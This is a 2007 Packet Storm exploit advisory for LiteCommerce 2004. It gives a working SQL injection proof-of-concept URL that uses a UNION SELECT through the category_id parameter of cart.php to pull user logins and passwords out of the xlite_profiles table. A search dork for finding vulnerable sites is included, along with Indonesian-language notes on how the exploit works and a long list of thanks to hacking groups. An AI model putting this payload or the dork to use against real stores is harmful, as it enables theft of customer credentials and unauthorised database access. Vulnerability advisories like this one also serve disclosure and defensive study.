litecommerce-sql.txt

🗓️ 21 Aug 2007 00:00:00Reported by k1tk4tType

packetstorm🔗 packetstormsecurity.com👁 30 Views

Remote SQL Injection in litecommerce 2004 with potential exposure of login and password from xlite_profiles tabl

`########################################################################  
# litecommerce Copyright © 2004 - Remote SQL Injection  
# Vendor : http://www.litecommerce.com/  
# Found By : k1tk4t - k1tk4t[4t]newhack.org  
# Location : Indonesia -- #newhack[dot]org @irc.dal.net  
# Dork : Powered by LiteCommerce  
########################################################################  
POC;  
  
http://localhost/cart.php?target=category&category_id=9999)union/**/select/**/concat(login,'-',password)/**/from/**/xlite_profiles/*  
  
jika exploit ini berhasil, anda akan melihat pesan error pada halaman, pesan error yang berisikan informasi kesalahan SQL  
sekaligus memberikan informasi "login" dan "password" yang berada pada table xlite_profiles  
exploit ini kemungkinan tidak berhasil pada litecommerce terbaru[tidak ada pesan error]  
########################################################################  
Terimakasih untuk;  
str0ke  
arioo[nyubicrew] yang telah memberikan link tersebut  
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer,k1ngk0ng  
dan semua temen2 komunitas security&hacking  
-----------------------  
-newhack[dot]org|staff-  
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX  
-----------------------  
all member newhack[dot]org  
-----------------------  
all member echo.or.id  
-----------------------  
all member www.yogyafree.net  
-----------------------  
all member www.sekuritionline.net  
-----------------------  
all member www.kecoak-elektronik.net  
-----------------------  
semua komunitas hacker&security Indonesia  
cintailah bahasa Indonesia  
`

21 Aug 2007 00:00Current

7.4High risk

Vulners AI Score7.4